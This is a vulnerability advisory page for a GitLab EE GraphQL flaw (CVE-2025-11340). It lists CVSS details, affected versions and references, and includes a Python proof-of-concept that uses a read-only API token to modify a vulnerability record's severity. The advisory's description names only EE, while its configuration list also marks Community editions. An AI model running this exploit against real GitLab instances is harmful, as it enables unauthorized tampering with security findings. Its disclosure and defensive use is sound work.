Security Vulnerability Report
CVE-2025-11340 CVSS 7.7 HIGH

CVE-2025-11340

Published: 2025-10-09 12:15:35
Last Modified: 2025-10-20 21:00:37

Description

GitLab has remediated an issue in GitLab EE affecting all versions from 18.3 to 18.3.4, 18.4 to 18.4.2 that, under certain conditions, could have allowed authenticated users with read-only API tokens to perform unauthorized write operations on vulnerability records by exploiting incorrectly scoped GraphQL mutations.

CVSS Details

CVSS Score
7.7
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N
Weakness
CWE-863 (Incorrect Authorization)

Configurations (Affected Products)

cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* (>= 18.3.0, < 18.3.4) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (>= 18.3.0, < 18.3.4) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* (>= 18.4.0, < 18.4.2) - VULNERABLE
cpe:2.3:a:gitlab:gitlab:*:*:*:*:enterprise:*:*:* (>= 18.4.0, < 18.4.2) - VULNERABLE
GitLab EE >= 18.3.0, < 18.3.4
GitLab EE >= 18.4.0, < 18.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-11340 PoC - GitLab EE GraphQL Unauthorized Mutation on Vulnerability Records
# This PoC demonstrates how a user with a read-only API token can perform
# unauthorized write operations on vulnerability records

import requests

# GitLab instance URL and read-only API token
GITLAB_URL = "https://gitlab.example.com"
API_TOKEN = "glpat-xxxxxxxxxxxxxxxxxxxx"  # read_api scope token

# GraphQL endpoint
GRAPHQL_URL = f"{GITLAB_URL}/api/graphql"

# Headers for GraphQL request
headers = {
    "Authorization": f"Bearer {API_TOKEN}",
    "Content-Type": "application/json",
}

# Exploit: attempt to update a vulnerability record using the read-only token.
# This mutation should be rejected but is accepted due to incorrect scope validation.
mutation = """
mutation VulnerabilityUpdate($id: VulnerabilityID!, $severity: VulnerabilitySeverity) {
  vulnerabilityUpdate(input: { id: $id, severity: $severity }) {
    vulnerability {
      id
      severity
    }
    errors
  }
}
"""

variables = {
    "id": "gid://gitlab/Vulnerability/123",
    "severity": "CRITICAL",
}

response = requests.post(
    GRAPHQL_URL,
    json={"query": mutation, "variables": variables},
    headers=headers,
    verify=False,  # disables TLS certificate verification; acceptable only against a lab instance
)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.json()}")
# If vulnerable, the mutation succeeds and modifies the vulnerability record
# despite the token having only read_api scope
```

References

https://about.gitlab.com/releases/2025/10/08/patch-release-gitlab-18-4-2-released/ (Release Notes, Vendor Advisory)
https://gitlab.com/gitlab-org/gitlab/-/issues/567847 (tagged as Broken Link in the NVD record)
